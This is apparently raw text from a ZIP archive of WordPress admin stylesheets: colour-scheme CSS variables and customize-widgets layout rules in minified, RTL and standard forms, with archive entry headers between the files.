(min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!2|HH&dist/base-styles/admin-schemes.min.cssnuȯbody.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!~"dist/base-styles/admin-schemes.cssnuȯbody.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!~&dist/base-styles/admin-schemes-rtl.cssnuȯbody.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!V$dist/customize-widgets/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector{ background:#fff; box-sizing:border-box; } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector *{ box-sizing:inherit; } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector{ margin:-12px; } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector h3{ margin-bottom:0; } #customize-theme-controls .customize-pane-child.control-section-sidebar.is-sub-section-open{ transform:translateX(100%); } @media (min-width:600px){ .customize-widgets-header{ margin-bottom:44px; } } .customize-widgets-header.is-fixed-toolbar-active{ margin-bottom:0; } .customize-widgets-header{ background:#f0f0f1; border-bottom:1px solid #e0e0e0; display:flex; justify-content:flex-end; margin:-15px -12px 0; z-index:8; } .customize-widgets-header-toolbar{ align-items:center; border:none; display:flex; width:100%; } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon{ border-radius:2px; color:#fff; height:32px; margin:12px auto 12px 0; min-width:32px; padding:0; } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon:before{ content:none; } @media not (prefers-reduced-motion){ .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon svg{ transition:transform .2s cubic-bezier(.165, .84, .44, 1); } } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed{ background:#1e1e1e; } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed svg{ transform:rotate(-45deg); } .customize-widgets-header-toolbar .components-button.has-icon.customize-widgets-editor-history-button.redo-button{ margin-right:-12px; } #customize-sidebar-outer-content{ min-width:100%; width:auto; } #customize-outer-theme-controls .widgets-inserter{ padding:0; } #customize-outer-theme-controls .widgets-inserter .customize-section-description-container{ display:none; } .customize-widgets-layout__inserter-panel{ background:#fff; } .customize-widgets-layout__inserter-panel-header{ align-items:center; border-bottom:1px solid #ddd; box-sizing:border-box; display:flex; height:46px; justify-content:space-between; padding:16px; } .customize-widgets-layout__inserter-panel-header .customize-widgets-layout__inserter-panel-header-title{ margin:0; } .block-editor-inserter__quick-inserter .block-editor-inserter__panel-content{ background:#fff; } .customize-widgets-keyboard-shortcut-help-modal__section{ margin:0 0 2rem; } .customize-widgets-keyboard-shortcut-help-modal__section-title{ font-size:.9rem; font-weight:600; } .customize-widgets-keyboard-shortcut-help-modal__shortcut{ align-items:baseline; border-top:1px solid #ddd; display:flex; margin-bottom:0; padding:.6rem 0; } .customize-widgets-keyboard-shortcut-help-modal__shortcut:last-child{ border-bottom:1px solid #ddd; } .customize-widgets-keyboard-shortcut-help-modal__shortcut:empty{ display:none; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-term{ font-weight:600; margin:0 1rem 0 0; text-align:left; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-description{ flex:1; margin:0; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ background:none; display:block; margin:0; padding:0; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ margin-top:10px; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key{ border-radius:8%; margin:0 .2rem; padding:.25rem .5rem; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{ margin:0 .2rem 0 0; } .components-popover.more-menu-dropdown__content{ z-index:99998; } .customize-control-sidebar_block_editor .block-editor-block-list__block-popover{ position:fixed !important; z-index:7; } .customize-control-sidebar_block_editor .components-popover,.customize-widgets-popover .components-popover{ position:fixed !important; } .customize-widgets-welcome-guide__image__wrapper{ background:#00a0d2; margin-bottom:8px; text-align:center; } .customize-widgets-welcome-guide__image{ height:auto; } .wrap .customize-widgets-welcome-guide__heading{ font-size:18px; font-weight:600; } .customize-widgets-welcome-guide__text{ line-height:1.7; } .customize-widgets-welcome-guide__button{ justify-content:center; margin:1em 0; width:100%; } .customize-widgets-welcome-guide__separator{ margin:1em 0; } .customize-widgets-welcome-guide__more-info{ line-height:1.4; } #customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section.open{ overflow:unset; } #customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section{ background-color:#fff; min-height:100%; padding-top:12px !important; } #customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section .customize-section-title{ margin-top:-12px !important; position:static !important; width:unset !important; } .components-modal__screen-overlay{ z-index:999999; } .customize-control-sidebar_block_editor,.customize-widgets-layout__inspector{ box-sizing:border-box; } .customize-control-sidebar_block_editor *,.customize-control-sidebar_block_editor :after,.customize-control-sidebar_block_editor :before,.customize-widgets-layout__inspector *,.customize-widgets-layout__inspector :after,.customize-widgets-layout__inspector :before{ box-sizing:inherit; }PK!' dist/customize-widgets/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector{ background:#fff; box-sizing:border-box; } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector *{ box-sizing:inherit; } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector{ margin:-12px; } #customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector h3{ margin-bottom:0; } #customize-theme-controls .customize-pane-child.control-section-sidebar.is-sub-section-open{ transform:translateX(-100%); } @media (min-width:600px){ .customize-widgets-header{ margin-bottom:44px; } } .customize-widgets-header.is-fixed-toolbar-active{ margin-bottom:0; } .customize-widgets-header{ background:#f0f0f1; border-bottom:1px solid #e0e0e0; display:flex; justify-content:flex-end; margin:-15px -12px 0; z-index:8; } .customize-widgets-header-toolbar{ align-items:center; border:none; display:flex; width:100%; } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon{ border-radius:2px; color:#fff; height:32px; margin:12px 0 12px auto; min-width:32px; padding:0; } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon:before{ content:none; } @media not (prefers-reduced-motion){ .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon svg{ transition:transform .2s cubic-bezier(.165, .84, .44, 1); } } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed{ background:#1e1e1e; } .customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed svg{ transform:rotate(45deg); } .customize-widgets-header-toolbar .components-button.has-icon.customize-widgets-editor-history-button.redo-button{ margin-left:-12px; } #customize-sidebar-outer-content{ min-width:100%; width:auto; } #customize-outer-theme-controls .widgets-inserter{ padding:0; } #customize-outer-theme-controls .widgets-inserter .customize-section-description-container{ display:none; } .customize-widgets-layout__inserter-panel{ background:#fff; } .customize-widgets-layout__inserter-panel-header{ align-items:center; border-bottom:1px solid #ddd; box-sizing:border-box; display:flex; height:46px; justify-content:space-between; padding:16px; } .customize-widgets-layout__inserter-panel-header .customize-widgets-layout__inserter-panel-header-title{ margin:0; } .block-editor-inserter__quick-inserter .block-editor-inserter__panel-content{ background:#fff; } .customize-widgets-keyboard-shortcut-help-modal__section{ margin:0 0 2rem; } .customize-widgets-keyboard-shortcut-help-modal__section-title{ font-size:.9rem; font-weight:600; } .customize-widgets-keyboard-shortcut-help-modal__shortcut{ align-items:baseline; border-top:1px solid #ddd; display:flex; margin-bottom:0; padding:.6rem 0; } .customize-widgets-keyboard-shortcut-help-modal__shortcut:last-child{ border-bottom:1px solid #ddd; } .customize-widgets-keyboard-shortcut-help-modal__shortcut:empty{ display:none; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-term{ font-weight:600; margin:0 0 0 1rem; text-align:right; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-description{ flex:1; margin:0; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ background:none; display:block; margin:0; padding:0; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ margin-top:10px; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key{ border-radius:8%; margin:0 .2rem; padding:.25rem .5rem; } .customize-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{ margin:0 0 0 .2rem; } .components-popover.more-menu-dropdown__content{ z-index:99998; } .customize-control-sidebar_block_editor .block-editor-block-list__block-popover{ position:fixed !important; z-index:7; } .customize-control-sidebar_block_editor .components-popover,.customize-widgets-popover .components-popover{ position:fixed !important; } .customize-widgets-welcome-guide__image__wrapper{ background:#00a0d2; margin-bottom:8px; text-align:center; } .customize-widgets-welcome-guide__image{ height:auto; } .wrap .customize-widgets-welcome-guide__heading{ font-size:18px; font-weight:600; } .customize-widgets-welcome-guide__text{ line-height:1.7; } .customize-widgets-welcome-guide__button{ justify-content:center; margin:1em 0; width:100%; } .customize-widgets-welcome-guide__separator{ margin:1em 0; } .customize-widgets-welcome-guide__more-info{ line-height:1.4; } #customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section.open{ overflow:unset; } #customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section{ background-color:#fff; min-height:100%; padding-top:12px !important; } #customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section .customize-section-title{ margin-top:-12px !important; position:static !important; width:unset !important; } .components-modal__screen-overlay{ z-index:999999; } .customize-control-sidebar_block_editor,.customize-widgets-layout__inspector{ box-sizing:border-box; } .customize-control-sidebar_block_editor *,.customize-control-sidebar_block_editor :after,.customize-control-sidebar_block_editor :before,.customize-widgets-layout__inspector *,.customize-widgets-layout__inspector :after,.customize-widgets-layout__inspector :before{ box-sizing:inherit; }PK!c$dist/customize-widgets/style.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector{background:#fff;box-sizing:border-box}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector *{box-sizing:inherit}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector{margin:-12px}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector h3{margin-bottom:0}#customize-theme-controls .customize-pane-child.control-section-sidebar.is-sub-section-open{transform:translateX(-100%)}@media (min-width:600px){.customize-widgets-header{margin-bottom:44px}}.customize-widgets-header.is-fixed-toolbar-active{margin-bottom:0}.customize-widgets-header{background:#f0f0f1;border-bottom:1px solid #e0e0e0;display:flex;justify-content:flex-end;margin:-15px -12px 0;z-index:8}.customize-widgets-header-toolbar{align-items:center;border:none;display:flex;width:100%}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon{border-radius:2px;color:#fff;height:32px;margin:12px 0 12px auto;min-width:32px;padding:0}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon:before{content:none}@media not (prefers-reduced-motion){.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon svg{transition:transform .2s cubic-bezier(.165,.84,.44,1)}}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed{background:#1e1e1e}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed svg{transform:rotate(45deg)}.customize-widgets-header-toolbar .components-button.has-icon.customize-widgets-editor-history-button.redo-button{margin-left:-12px}#customize-sidebar-outer-content{min-width:100%;width:auto}#customize-outer-theme-controls .widgets-inserter{padding:0}#customize-outer-theme-controls .widgets-inserter .customize-section-description-container{display:none}.customize-widgets-layout__inserter-panel{background:#fff}.customize-widgets-layout__inserter-panel-header{align-items:center;border-bottom:1px solid #ddd;box-sizing:border-box;display:flex;height:46px;justify-content:space-between;padding:16px}.customize-widgets-layout__inserter-panel-header .customize-widgets-layout__inserter-panel-header-title{margin:0}.block-editor-inserter__quick-inserter .block-editor-inserter__panel-content{background:#fff}.customize-widgets-keyboard-shortcut-help-modal__section{margin:0 0 2rem}.customize-widgets-keyboard-shortcut-help-modal__section-title{font-size:.9rem;font-weight:600}.customize-widgets-keyboard-shortcut-help-modal__shortcut{align-items:baseline;border-top:1px solid #ddd;display:flex;margin-bottom:0;padding:.6rem 0}.customize-widgets-keyboard-shortcut-help-modal__shortcut:last-child{border-bottom:1px solid #ddd}.customize-widgets-keyboard-shortcut-help-modal__shortcut:empty{display:none}.customize-widgets-keyboard-shortcut-help-modal__shortcut-term{font-weight:600;margin:0 0 0 1rem;text-align:right}.customize-widgets-keyboard-shortcut-help-modal__shortcut-description{flex:1;margin:0}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{background:none;display:block;margin:0;padding:0}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{margin-top:10px}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key{border-radius:8%;margin:0 .2rem;padding:.25rem .5rem}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{margin:0 0 0 .2rem}.components-popover.more-menu-dropdown__content{z-index:99998}.customize-control-sidebar_block_editor .block-editor-block-list__block-popover{position:fixed!important;z-index:7}.customize-control-sidebar_block_editor .components-popover,.customize-widgets-popover .components-popover{position:fixed!important}.customize-widgets-welcome-guide__image__wrapper{background:#00a0d2;margin-bottom:8px;text-align:center}.customize-widgets-welcome-guide__image{height:auto}.wrap .customize-widgets-welcome-guide__heading{font-size:18px;font-weight:600}.customize-widgets-welcome-guide__text{line-height:1.7}.customize-widgets-welcome-guide__button{justify-content:center;margin:1em 0;width:100%}.customize-widgets-welcome-guide__separator{margin:1em 0}.customize-widgets-welcome-guide__more-info{line-height:1.4}#customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section.open{overflow:unset}#customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section{background-color:#fff;min-height:100%;padding-top:12px!important}#customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section .customize-section-title{margin-top:-12px!important;position:static!important;width:unset!important}.components-modal__screen-overlay{z-index:999999}.customize-control-sidebar_block_editor,.customize-widgets-layout__inspector{box-sizing:border-box}.customize-control-sidebar_block_editor *,.customize-control-sidebar_block_editor :after,.customize-control-sidebar_block_editor :before,.customize-widgets-layout__inspector *,.customize-widgets-layout__inspector :after,.customize-widgets-layout__inspector 